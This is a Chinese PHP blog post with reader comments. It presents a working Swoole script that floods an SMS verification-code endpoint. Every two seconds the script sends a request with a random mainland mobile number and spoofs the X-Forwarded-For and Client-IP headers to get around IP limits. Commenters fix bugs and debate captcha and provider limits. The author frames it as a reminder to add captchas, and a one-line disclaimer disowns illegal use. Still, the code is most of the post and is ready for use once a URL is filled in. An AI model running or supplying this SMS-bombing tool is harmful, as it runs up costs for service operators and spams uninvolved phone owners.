PHP 攻击短信验证码接口

woann 的个人博客 / 4 / 9 / 创建于 6年前 / 更新于 6年前

声明仅供技术交流，如有其它非法用途，和本博客无关

代码如下

<?php
header("Content-type: text/html; charset=utf-8");
ini_set('display_errors','On');
function curl_post($url, array $params = array(),$ip, $timeout)
{
    $this_header = array(
        "charset=UTF-8",
        'X-FORWARDED-FOR:'.$ip,
        'CLIENT-IP:'.$ip
    );
    $ch = curl_init();//初始化
    curl_setopt($ch, CURLOPT_URL, $url);//抓取指定网页
    curl_setopt($ch,CURLOPT_HTTPHEADER,$this_header);
    curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.81 Chrome/43.0.2357.81 Safari/537.36");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($ch);//运行curl
    curl_close($ch);
    return ($data);
}
swoole_timer_tick(2000, function ($timer_id) {
    $ip = get_rand_ip();
    $phone = getPhone();
    //这里添加短信验证码接口ur，并传入对应手机号参数(参数key看你要攻击的接口是啥，我这里是phone)
    $res = curl_post('替换成短信接口url',['phone'=>$phone],$ip,30);
    if($res == '0'){
        echo '验证码发送成功phone:'.$phone.'time:'.date('Y-m-d H:i:s').' 虚拟ip:'.$ip.PHP_EOL;
    }else{
        echo $res.PHP_EOL;
    }
});

function getPhone()
{
    $arr = array(
        130,131,132,133,134,135,136,137,138,139,
        144,147,
        150,151,152,153,155,156,157,158,159,
        176,177,178,
        180,181,182,183,184,185,186,187,188,189,
    );
    return $arr[array_rand($arr)].mt_rand(1000,9999).mt_rand(1000,9999);
}

function get_rand_ip(){
    $arr_1 = array("218","218","66","66","218","218","60","60","202","204","66","66","66","59","61","60","222","221","66","59","60","60","66","218","218","62","63","64","66","66","122","211");
    $randarr= mt_rand(0,count($arr_1) - 1);
    $ip1id = $arr_1[$randarr];
    $ip2id=  round(rand(600000,  2550000)  /  10000);
    $ip3id=  round(rand(600000,  2550000)  /  10000);
    $ip4id=  round(rand(600000,  2550000)  /  10000);
    return  $ip1id . "." . $ip2id . "." . $ip3id . "." . $ip4id;
}

php swoole 短信

本作品采用《CC 协议》，转载必须注明作者和本文链接

本帖由系统于 5年前自动加精

221 声望

https://www.woann.cn

《L04 微信小程序从零到发布》

从小程序个人账户申请开始，带你一步步进行开发一个微信小程序，直到提交微信控制台上线发布。

《L03 构架 API 服务器》

你将学到如 RESTFul 设计风格、PostMan 的使用、OAuth 流程，JWT 概念及使用和 API 开发相关的进阶知识。

推荐文章：

更多推荐...

花了四个月打磨的 Laravel Plus 开源 29 / 96 |

PHP 程序员转 Go 语言的经历分享 19 / 12 |

手摸手带你使用 docker-compose 编排一个开发环境 18 / 15 |

[求职] 重生之不再做PHP 12 / 83 |

冯老师的困惑 —— PHP 挂了 21 / 4 |

PHP使用yield 读取超大型目录、大目录的方法 15 / 14 |

讨论数量: 9

lovecn

188 声望

curl_post($url, array $params = array(),$ip, $timeout) array $params = array()得放最后把

6年前评论

王哲军

课程读者 0 声望

$randarr= mt_rand(0,count($arr_1))应该改成$randarr= mt_rand(0,count($arr_1)-1)

6年前评论

woann

221 声望

@王哲军对，我记得是取中间的，然而是包括的。。

6年前评论

赌赌赌赌赌赌赌圣！

188 声望

现在发短信接口都有滑块验证或验证码验证，通过了才给发短信的，只能说想象很美好 = =

6年前评论

woann

221 声望

@HI 你会发现总有没有验证码的，这篇文章也是在提醒大家短信验证码中，图形验证码的必要性

6年前评论

allen9009

4 声望 / 搬砖 @ 广州不知名公司

图灵测试的年代

6年前评论

Code_Er

课程读者 33 声望 / 404研发员 @ BUG研发机构

短信服务商一般都有限制把？就算程序不限制

6年前评论

Aaron

课程读者 129 声望 / 高级工程师 @ 环媒股份

@Code_Er 嗯，短信服务商会有限制

6年前评论

loveinalife

133 声望 / php @ phper

喜闻乐见 :joy:

6年前评论

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容，与人为善，比聪明更重要！

帮助

未填写

私信

文章归档

1 篇 2020 年 7 月 1 篇 2020 年 4 月 2 篇 2020 年 3 月 8 篇 2019 年 1 月 1 篇 2018 年 12 月

4年前在Laravel中集成腾讯云移动(APP)推送（TPNS） 4年前 PHP (Laravel) 实现 iOS 内购服务端验证 5年前 Lumen/Laravel 中支付宝 / 微信第三方 App 登陆 5年前使用 yansongda/pay 进行支付宝和微信 App 支付 6年前 vue 学习之 (一) 相关环境的搭建

65 woann-chat 基于 laravelS 和 layim 的聊天系统 45 yamecent-admin 基于 Laravel 框架的 rbac 后台管理系统 34 nginx 实现动态生成缩略图已在线上实际应用 22 PHP 使用 jwt 用户身份认证 12 PHP 攻击短信验证码接口

博客标签

laravel后台管理

动态生成缩略图

成为赞助商